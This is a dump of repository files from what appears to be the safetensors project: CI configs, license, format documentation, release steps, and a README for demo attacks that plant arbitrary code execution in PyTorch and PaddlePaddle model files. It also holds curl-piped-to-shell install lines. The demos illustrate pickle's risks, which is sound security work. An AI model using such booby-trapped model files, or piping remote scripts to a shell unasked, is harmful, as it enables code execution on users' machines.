Install cargo-llvm-cov for Ubuntu 36 | if: matrix.os == 'ubuntu-latest' 37 | run: cargo install cargo-llvm-cov 38 | 39 | - name: Build 40 | run: cargo build --all-targets --verbose 41 | 42 | - name: Lint with Clippy 43 | run: cargo clippy --all-targets -- -D warnings 44 | 45 | - name: Run Tests 46 | run: cargo test --verbose 47 | 48 | - name: Run No-STD Tests 49 | run: cargo test --no-default-features --features alloc --verbose 50 | 51 | - name: Run Audit 52 | # RUSTSEC-2021-0145 is criterion so only within benchmarks 53 | run: cargo audit -D warnings --ignore RUSTSEC-2021-0145 54 | 55 | - name: Coverage report 56 | if: matrix.os == 'ubuntu-latest' 57 | run: cargo llvm-cov --release --lcov --output-path lcov.info 58 | 59 | # - name: Upload to codecov.io 60 | # if: matrix.os == 'ubuntu-latest' 61 | # uses: codecov/codecov-action@v3 62 | # with: 63 | # token: ${{ secrets.CODECOV_TOKEN }} # not required for public repos 64 | # working-directory: ./safetensors 65 | # fail_ci_if_error: true 66 | -------------------------------------------------------------------------------- /.github/workflows/stale.yml: -------------------------------------------------------------------------------- 1 | name: 'Close stale issues and PRs' 2 | on: 3 | schedule: 4 | - cron: '30 1 * * *' 5 | 6 | jobs: 7 | stale: 8 | runs-on: ubuntu-latest 9 | steps: 10 | - uses: actions/stale@v8 11 | with: 12 | stale-issue-message: 'This issue is stale because it has been 
open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.' 13 | days-before-stale: 30 14 | days-before-close: 5 15 | -------------------------------------------------------------------------------- /.github/workflows/trufflehog.yml: -------------------------------------------------------------------------------- 1 | on: 2 | push: 3 | 4 | name: Secret Leaks 5 | 6 | jobs: 7 | trufflehog: 8 | runs-on: ubuntu-latest 9 | steps: 10 | - name: Checkout code 11 | uses: actions/checkout@v4 12 | with: 13 | fetch-depth: 0 14 | - name: Secret Scanning 15 | uses: trufflesecurity/trufflehog@main 16 | -------------------------------------------------------------------------------- /.github/workflows/upload_pr_documentation.yml: -------------------------------------------------------------------------------- 1 | name: Upload PR Documentation 2 | 3 | on: 4 | workflow_run: 5 | workflows: ["Build PR Documentation"] 6 | types: 7 | - completed 8 | 9 | jobs: 10 | build: 11 | uses: huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml@main 12 | with: 13 | package_name: safetensors 14 | secrets: 15 | hf_token: ${{ secrets.HF_DOC_BUILD_PUSH }} 16 | comment_bot_token: ${{ secrets.COMMENT_BOT_TOKEN }} -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | safetensors/target 2 | safetensors/**/Cargo.lock 3 | bindings/python/Cargo.lock 4 | *.bin 5 | *.h5 6 | *.msgpack 7 | *.pt 8 | *.pdparams 9 | *.safetensors 10 | *.npz 11 | -------------------------------------------------------------------------------- /.pre-commit-config.yaml: -------------------------------------------------------------------------------- 1 | repos: 2 | - repo: https://github.com/Narsil/pre-commit-rust 3 | rev: 0c016cee78144d06d906fccc7715d607a946ca5c 4 | hooks: 5 | - id: fmt 6 | name: "Rust (fmt)" 7 | args: ["--manifest-path", "safetensors/Cargo.toml", "--"] 8 | - id: clippy 9 | name: "Rust (clippy)" 10 | args: 11 | [ 12 | "--manifest-path", 13 | "safetensors/Cargo.toml", 14 | "--all-targets", 15 | "--", 16 | "-Dwarnings", 17 | ] 18 | - repo: https://github.com/Narsil/pre-commit-rust 19 | rev: 0c016cee78144d06d906fccc7715d607a946ca5c 20 | hooks: 21 | - id: fmt 22 | name: "Python (fmt)" 23 | args: ["--manifest-path", "bindings/python/Cargo.toml", "--"] 24 | - id: clippy 25 | name: "Python (clippy)" 26 | args: 27 | [ 28 | "--manifest-path", 29 | "bindings/python/Cargo.toml", 30 | "--all-targets", 31 | "--", 32 | "-Dwarnings", 33 | ] 34 | - repo: https://github.com/psf/black 35 | rev: 22.3.0 36 | hooks: 37 | - id: black 38 | name: "Python (black)" 39 | args: ["--line-length", "119", "--target-version", "py35"] 40 | types: ["python"] 41 | - repo: https://github.com/pycqa/flake8 42 | rev: 3.8.3 43 | hooks: 44 | - id: flake8 45 | args: ["--config", "bindings/python/setup.cfg"] 46 | - repo: https://github.com/pre-commit/mirrors-isort 47 | rev: v5.7.0 # Use the revision sha / tag you want to point at 48 | hooks: 49 | - id: isort 50 | -------------------------------------------------------------------------------- /Dockerfile.s390x.test: -------------------------------------------------------------------------------- 1 | FROM s390x/python 2 | RUN wget https://repo.anaconda.com/miniconda/Miniconda3-py311_23.5.2-0-Linux-s390x.sh \ 3 | && bash Miniconda3-py311_23.5.2-0-Linux-s390x.sh -b \ 4 | && rm -f Miniconda3-py311_23.5.2-0-Linux-s390x.sh 5 | RUN curl --proto '=https' --tlsv1.2 -sSf 
https://sh.rustup.rs | bash -s -- -y 6 | RUN /root/miniconda3/bin/conda install pytorch cpuonly -c pytorch -y 7 | WORKDIR /safetensors/ 8 | RUN /root/miniconda3/bin/pip install -U pip pytest 9 | # RUN /root/miniconda3/bin/pip install -U huggingface_hub 10 | # RUN /root/miniconda3/bin/python -c 'from huggingface_hub import hf_hub_download; filename = hf_hub_download("roberta-base", "model.safetensors")' 11 | COPY . . 12 | SHELL ["/bin/bash", "-c"] 13 | WORKDIR /safetensors/bindings/python/ 14 | RUN source /root/.cargo/env && /root/miniconda3/bin/pip install -e . 15 | RUN /root/miniconda3/bin/pytest -sv tests/test_pt_* tests/test_simple.py 16 | # RUN /root/miniconda3/bin/python -c 'from huggingface_hub import hf_hub_download; filename = hf_hub_download("roberta-base", "model.safetensors"); from safetensors.torch import load_file; weights = load_file(filename); assert weights["roberta.embeddings.position_embeddings.weight"][0][0].abs().item() > 1e-10' 17 | ENTRYPOINT /bin/bash 18 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 
47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. 
You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. 
You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | doc: 2 | cd safetensors && cargo readme > README.md && cargo readme > ../README.md && cd .. 3 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

Hugging Face Safetensors Library

Python
[![Pypi](https://img.shields.io/pypi/v/safetensors.svg)](https://pypi.org/pypi/safetensors/)
[![Documentation](https://img.shields.io/website/http/huggingface.co/docs/safetensors/index.svg?label=docs)](https://huggingface.co/docs/safetensors/index)
[![Codecov](https://codecov.io/github/huggingface/safetensors/coverage.svg?branch=main)](https://codecov.io/gh/huggingface/safetensors)
[![Downloads](https://static.pepy.tech/badge/safetensors/month)](https://pepy.tech/project/safetensors)

Rust
[![Crates.io](https://img.shields.io/crates/v/safetensors.svg)](https://crates.io/crates/safetensors)
[![Documentation](https://docs.rs/safetensors/badge.svg)](https://docs.rs/safetensors/)
[![Codecov](https://codecov.io/github/huggingface/safetensors/coverage.svg?branch=main)](https://codecov.io/gh/huggingface/safetensors)
[![Dependency status](https://deps.rs/repo/github/huggingface/safetensors/status.svg?path=safetensors)](https://deps.rs/repo/github/huggingface/safetensors?path=safetensors)

# safetensors

## Safetensors

This repository implements a new, simple format for storing tensors
safely (as opposed to pickle) while remaining fast (zero-copy).

### Installation
#### Pip

You can install safetensors via the pip manager:

```bash
pip install safetensors
```

#### From source

To build from source, you need Rust:

```bash
# Install Rust
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
# Make sure it's up to date and using the stable channel
rustup update
git clone https://github.com/huggingface/safetensors
cd safetensors/bindings/python
pip install setuptools_rust
pip install -e .
```

### Getting started

```python
import torch
from safetensors import safe_open
from safetensors.torch import save_file

tensors = {
    "weight1": torch.zeros((1024, 1024)),
    "weight2": torch.zeros((1024, 1024))
}
save_file(tensors, "model.safetensors")

tensors = {}
with safe_open("model.safetensors", framework="pt", device="cpu") as f:
    for key in f.keys():
        tensors[key] = f.get_tensor(key)
```

[Python documentation](https://huggingface.co/docs/safetensors/index)


### Format

- 8 bytes: `N`, an unsigned little-endian 64-bit integer, containing the size of the header
- N bytes: a JSON UTF-8 string representing the header.
  - The header data MUST begin with a `{` character (0x7B).
  - The header data MAY be padded with trailing whitespace (0x20).
  - The header is a dict like `{"TENSOR_NAME": {"dtype": "F16", "shape": [1, 16, 256], "data_offsets": [BEGIN, END]}, "NEXT_TENSOR_NAME": {...}, ...}`,
  - `data_offsets` point to the tensor data relative to the beginning of the byte buffer (i.e. not an absolute position in the file),
    with `BEGIN` as the starting offset and `END` as the one-past offset (so total tensor byte size = `END - BEGIN`).
  - A special key `__metadata__` is allowed to contain a free-form string-to-string map. Arbitrary JSON is not allowed; all values must be strings.
- Rest of the file: byte buffer.

Notes:
- Duplicate keys are disallowed. Not all parsers may respect this.
- In general, the accepted subset of JSON is implicitly decided by `serde_json` for
  this library. Anything obscure (odd ways to represent integers, newlines, and
  escapes in UTF-8 strings) might be modified at a later time; this would only be
  done for safety concerns.
- Tensor values are not validated; in particular, NaN and +/-Inf may be present
  in the file.
- Empty tensors (tensors with one dimension being 0) are allowed.
  They do not store any data in the data buffer, yet retain a size in the header.
  They don't really bring a lot of value but are accepted since they are valid tensors
  from a traditional tensor library's perspective (torch, tensorflow, numpy, ...).
- 0-rank tensors (tensors with shape `[]`) are allowed; they are merely scalars.
- The byte buffer needs to be entirely indexed and cannot contain holes. This prevents
  the creation of polyglot files.
- Endianness: little-endian.
- Order: 'C' or row-major.
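
To make the byte layout above concrete, here is a minimal sketch of a header reader using only the Python standard library. The file name is just a placeholder, and `read_header` is a hypothetical helper, not part of the safetensors API:

```python
import json
import struct

def read_header(path):
    """Read a safetensors header following the layout described above."""
    with open(path, "rb") as f:
        # 8 bytes: N, an unsigned little-endian 64-bit integer (header size).
        (n,) = struct.unpack("<Q", f.read(8))
        # N bytes: UTF-8 JSON header (possibly padded with trailing spaces).
        return json.loads(f.read(n).decode("utf-8"))

header = read_header("model.safetensors")
metadata = header.pop("__metadata__", None)  # optional free-form string map
for name, info in header.items():
    begin, end = info["data_offsets"]  # offsets into the byte buffer
    print(name, info["dtype"], info["shape"], end - begin, "bytes")
```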

### Yet another format?

The main rationale for this crate is to remove the need to use
`pickle`, which `PyTorch` uses by default.
There are other formats used in machine learning, as well as more
general-purpose formats.


Let's take a look at alternatives and why this format is deemed interesting.
This is my very personal and probably biased view:

| Format                  | Safe | Zero-copy | Lazy loading | No file size limit | Layout control | Flexibility | Bfloat16/Fp8 |
| ----------------------- | --- | --- | --- | --- | --- | --- | --- |
| pickle (PyTorch)        | ✗ | ✗ | ✗ | 🗸 | ✗ | 🗸 | 🗸 |
| H5 (Tensorflow)         | 🗸 | ✗ | 🗸 | 🗸 | ~ | ~ | ✗ |
| SavedModel (Tensorflow) | 🗸 | ✗ | ✗ | 🗸 | 🗸 | ✗ | 🗸 |
| MsgPack (flax)          | 🗸 | 🗸 | ✗ | 🗸 | ✗ | ✗ | 🗸 |
| Protobuf (ONNX)         | 🗸 | ✗ | ✗ | ✗ | ✗ | ✗ | 🗸 |
| Cap'n'Proto             | 🗸 | 🗸 | ~ | 🗸 | 🗸 | ~ | ✗ |
| Arrow                   | ? | ? | ? | ? | ? | ? | ✗ |
| Numpy (npy,npz)         | 🗸 | ? | ? | ✗ | 🗸 | ✗ | ✗ |
| pdparams (Paddle)       | ✗ | ✗ | ✗ | 🗸 | ✗ | 🗸 | 🗸 |
| SafeTensors             | 🗸 | 🗸 | 🗸 | 🗸 | 🗸 | ✗ | 🗸 |

- Safe: Can I use a randomly downloaded file and expect not to run arbitrary code?
- Zero-copy: Does reading the file require more memory than the original file?
- Lazy loading: Can I inspect the file without loading everything? And can I load only
  some tensors in it without scanning the whole file (important in a distributed setting)?
- Layout control: Lazy loading is not necessarily enough, since if the information about tensors is spread out in your file, then even if the information is lazily accessible you might have to access most of your file to read the available tensors (incurring many DISK -> RAM copies). Controlling the layout to keep fast access to single tensors is important.
- No file size limit: Is there a limit to the file size?
- Flexibility: Can I save custom code in the format and be able to use it later with zero extra code? (~ means we can store more than pure tensors, but no custom code)
- Bfloat16/Fp8: Does the format support native bfloat16/fp8 (meaning no weird workarounds are
  necessary)? This is becoming increasingly important in the ML world.


### Main objections

- Pickle: Unsafe, runs arbitrary code.
- H5: Apparently now discouraged for TF/Keras. Otherwise it actually seems like a great fit. It has had some classic use-after-free issues, putting it on a very different security level than pickle. Also ~210k lines of code vs ~400 lines for this lib currently.
- SavedModel: Tensorflow-specific (it contains TF graph information).
- MsgPack: No layout control to enable lazy loading (important for loading specific parts in a distributed setting).
- Protobuf: Hard 2GB max file size limit.
- Cap'n'Proto: Float16 support is not present [link](https://capnproto.org/language.html#built-in-types), so a manual wrapper over a byte buffer would be necessary. Layout control seems possible but not trivial, as buffers have limitations [link](https://stackoverflow.com/questions/48458839/capnproto-maximum-filesize).
- Numpy (npz): No `bfloat16` support. Vulnerable to zip bombs (DOS). Not zero-copy.
- Arrow: No `bfloat16` support.
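
To illustrate the lazy-loading and layout-control rows above, the Python bindings let you inspect a file and read a single tensor, or even a slice of one, without touching the rest of it. A minimal sketch; the file and tensor names reuse the getting-started example:

```python
from safetensors import safe_open

# Only the small JSON header is parsed up front; tensor bytes are
# fetched on demand, so this stays cheap even for very large files.
with safe_open("model.safetensors", framework="pt", device="cpu") as f:
    print(f.keys())                    # tensor names, from the header alone
    tensor_slice = f.get_slice("weight1")
    print(tensor_slice.get_shape())    # shape, still without reading data
    first_rows = tensor_slice[0:16]    # reads only these rows from disk
```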
140 | 
141 | 
142 | ### Main oppositions
143 | 
144 | - Pickle: Unsafe, runs arbitrary code
145 | - H5: Apparently now discouraged for TF/Keras. Seems like a great fit otherwise actually. Some classic use-after-free issues have been reported. On a very different level than pickle security-wise. Also 210k lines of code vs ~400 lines for this lib currently.
146 | - SavedModel: Tensorflow specific (it contains TF graph information).
147 | - MsgPack: No layout control to enable lazy loading (important for loading specific parts in a distributed setting)
148 | - Protobuf: Hard 2GB max file size limit
149 | - Cap'n'proto: Float16 support is not present [link](https://capnproto.org/language.html#built-in-types) so using a manual wrapper over a byte-buffer would be necessary. Layout control seems possible but not trivial as buffers have limitations [link](https://stackoverflow.com/questions/48458839/capnproto-maximum-filesize).
150 | - Numpy (npz): No `bfloat16` support. Vulnerable to zip bombs (DOS). Not zero-copy.
151 | - Arrow: No `bfloat16` support.
152 | 
153 | ### Notes
154 | 
155 | - Zero-copy: No format is really zero-copy in ML, the data needs to go from disk to RAM/GPU RAM (and that takes time). On CPU, if the file is already in the OS cache, then reading can
156 |   truly be zero-copy, whereas on GPU there is no such disk cache, so a copy is always required,
157 |   though you can bypass allocating all the tensors on CPU at any given point.
158 |   SafeTensors is not zero-copy for the header. The choice of JSON is pretty arbitrary, but deserializing it takes a negligible fraction of the time required to load the actual tensor data, and it is human-readable, so I went that way (the header is also negligible in size compared to the tensor data).
159 | 
160 | - Endianness: Little-endian. This can be modified later, but it feels really unnecessary at the
161 |   moment.
162 | - Order: 'C' or row-major. This seems to have won. We can add that information later if needed.
163 | - Stride: No striding; all tensors need to be packed before being serialized. I have yet to see a case where a strided tensor stored in serialized format seems useful.
164 | 
165 | ### Benefits
166 | 
167 | Since we can invent a new format, we can propose additional benefits:
168 | 
169 | - Prevent DOS attacks: We can craft the format in such a way that it's almost
170 |   impossible to use malicious files to DOS attack a user. Currently, there's a 100MB limit
171 |   on the size of the header to prevent parsing extremely large JSON.
172 |   Also, when reading the file, there's a guarantee that addresses in the file
173 |   do not overlap in any way, meaning that when you're loading a file you should never
174 |   exceed the size of the file in memory.
175 | 
176 | - Faster load: PyTorch seems to be the fastest format to load among the major
177 |   ML formats. However, it does seem to make an extra copy on CPU, which we
178 |   can bypass in this lib by using `torch.UntypedStorage.from_file`.
179 |   Currently, CPU loading times are extremely fast with this lib compared to pickle.
180 |   GPU loading times are as fast as or faster than the PyTorch equivalent.
181 |   Loading first on CPU with memmapping with torch, and then moving all tensors to GPU, seems
182 |   to be faster too somehow (similar behavior in torch pickle).
183 | 
184 | - Lazy loading: in distributed (multi-node or multi-gpu) settings, it's nice to be able to
185 |   load only part of the tensors on the various processes. For
186 |   [BLOOM](https://huggingface.co/bigscience/bloom), using this format brought loading the model
187 |   on 8 GPUs down from 10 minutes with regular PyTorch weights to 45 seconds.
188 |   This really speeds up feedback loops when developing on the model. For instance,
189 |   you don't have to keep separate copies of the weights when changing the distribution
190 |   strategy (for instance Pipeline Parallelism vs Tensor Parallelism). A sketch of such partial loading follows.
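A minimal sketch of the partial-loading idea (a toy stand-in for tensor-parallel sharding; `model.safetensors` and the tensor name `embedding` are placeholders):

```python
from safetensors import safe_open

# Imagine rank 0 of a 2-way tensor-parallel setup: it only needs
# the first half of the rows of "embedding".
with safe_open("model.safetensors", framework="pt", device="cpu") as f:
    emb = f.get_slice("embedding")
    rows = emb.get_shape()[0]
    shard = emb[: rows // 2]  # only these bytes are read from the file
```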
192 | 
193 | License: Apache-2.0
194 | 
-------------------------------------------------------------------------------- /RELEASE.md: --------------------------------------------------------------------------------
1 | ## How to release
2 | 
3 | # Before the release
4 | 
5 | Simple checklist on how to make releases for `safetensors`.
6 | 
7 | - Freeze `main` branch.
8 | - Run all tests (check that CI has properly run).
9 | - If any significant work, check benchmarks:
10 |   - `cd safetensors && cargo bench` (needs to be run on the latest release tag to measure the difference if it's your first time)
11 | - Run all `transformers` tests. (`transformers` is a big user of `safetensors`; we need
12 |   to make sure we don't break it, and testing is one way to make sure nothing unforeseen
13 |   has been done.)
14 |   - Run all fast tests at the VERY least (not just the tokenization tests). (`RUN_PIPELINE_TESTS=1 CUDA_VISIBLE_DEVICES=-1 pytest -sv tests/`)
15 |   - When all *fast* tests work, then we can also (it's recommended to) run the whole `transformers`
16 |     test suite.
17 |     - Rebase this [PR](https://github.com/huggingface/transformers/pull/16708).
18 |       This will create new docker images ready to run the test suites with `safetensors` from the main branch.
19 |     - Wait for actions to finish
20 |     - Rebase this [PR](https://github.com/huggingface/transformers/pull/16712)
21 |       This will run the actual full test suite.
22 |     - Check the results.
23 | - **If any breaking change has been done**, make sure the version can safely be increased for transformers users (the `safetensors` pin needs to make sure users don't upgrade before `transformers` has). [link](https://github.com/huggingface/transformers/blob/main/setup.py#L154)
24 |   For instance `safetensors>=0.10,<0.11` so we can safely upgrade to `0.11` without impacting
25 |   current users
26 | - Then start a new PR containing all desired code changes from the following steps.
27 | - You will `Create release` after the code modifications are on `master`.
28 | 
29 | # Rust
30 | 
31 | - `safetensors` (rust, python & node) versions don't have to be in sync, but it's
32 |   very common to release all of them at once for new features.
33 | - Edit `Cargo.toml` to reflect the new version
34 | - Edit `CHANGELOG.md`:
35 |   - Add relevant PRs that were added (python PRs do not belong, for instance).
36 |   - Add links at the end of the files.
37 | - Go to [Releases](https://github.com/huggingface/safetensors/releases)
38 | - Create a new Release:
39 |   - Mark it as pre-release
40 |   - Use the new version name with a new tag (create on publish) `vX.X.X`.
41 |   - Copy-paste the new part of the `CHANGELOG.md`
42 | - ⚠️ Click on `Publish release`. This will start the whole process of building and uploading
43 |   the new version to `crates.io`; there's no going back after this
44 | - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly.
45 | - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the registry properly, you can try again.
46 | 
47 | 
48 | # Python
49 | 
50 | - Edit `bindings/python/setup.py` to reflect the new version.
51 | - Edit `bindings/python/py_src/safetensors/__init__.py` to reflect the new version.
52 | - Edit `CHANGELOG.md`:
53 |   - Add relevant PRs that were added (node PRs do not belong, for instance).
54 |   - Add links at the end of the files.
55 | - Go to [Releases](https://github.com/huggingface/safetensors/releases)
56 | - Create a new Release:
57 |   - Mark it as pre-release
58 |   - Use the new version name with a new tag (create on publish) `python-vX.X.X`.
59 |   - Copy-paste the new part of the `CHANGELOG.md`
60 | - ⚠️ Click on `Publish release`. This will start the whole process of building and uploading
61 |   the new version to `pypi`; there's no going back after this
62 | - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly.
63 | - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the registry properly, you can try again.
64 | - This CI/CD has 3 distinct builds: `Pypi` (normal), `conda` and `extra`. `Extra` is REALLY slow (~4h); this is normal since it has to rebuild many things, but it enables the wheel to be available for old Linuxes
65 | 
66 | # Node
67 | 
68 | - Edit `bindings/node/package.json` to reflect the new version.
69 | - Edit `CHANGELOG.md`:
70 |   - Add relevant PRs that were added (python PRs do not belong, for instance).
71 |   - Add links at the end of the files.
72 | - Go to [Releases](https://github.com/huggingface/safetensors/releases)
73 | - Create a new Release:
74 |   - Mark it as pre-release
75 |   - Use the new version name with a new tag (create on publish) `node-vX.X.X`.
76 |   - Copy-paste the new part of the `CHANGELOG.md`
77 | - ⚠️ Click on `Publish release`. This will start the whole process of building and uploading
78 |   the new version to `npm`; there's no going back after this
79 | - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly.
80 | - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the registry properly, you can try again.
81 | 
82 | 
83 | # Testing the CI/CD for release
84 | 
85 | 
86 | If you want to make modifications to the CI/CD of the release GH actions, you need
87 | to:
88 | - **Comment out the part that uploads the artifacts** to `crates.io`, `PyPi` or `npm`.
89 | - Change the trigger mechanism so it can trigger every time you push to your branch.
90 | - Keep pushing your changes until the artifacts are properly created.
-------------------------------------------------------------------------------- /attacks/README.md: --------------------------------------------------------------------------------
1 | The purpose of this directory is to showcase various attacks (and how to create your own).
2 | 
3 | 
4 | # Torch Arbitrary code execution
5 | 
6 | Try it out. This will create a seemingly innocuous `torch_ace.pt` file.
7 | ```
8 | python torch_ace_create.py
9 | python torch_ace_get_pwned.py
10 | ```
11 | 
12 | # PaddlePaddle Arbitrary code execution
13 | 
14 | Try it out. This will create a seemingly innocuous `paddle_ace.pdparams` file.
15 | ```
16 | python paddle_ace_create.py
17 | python paddle_ace_get_pwned.py
18 | ```
19 | 
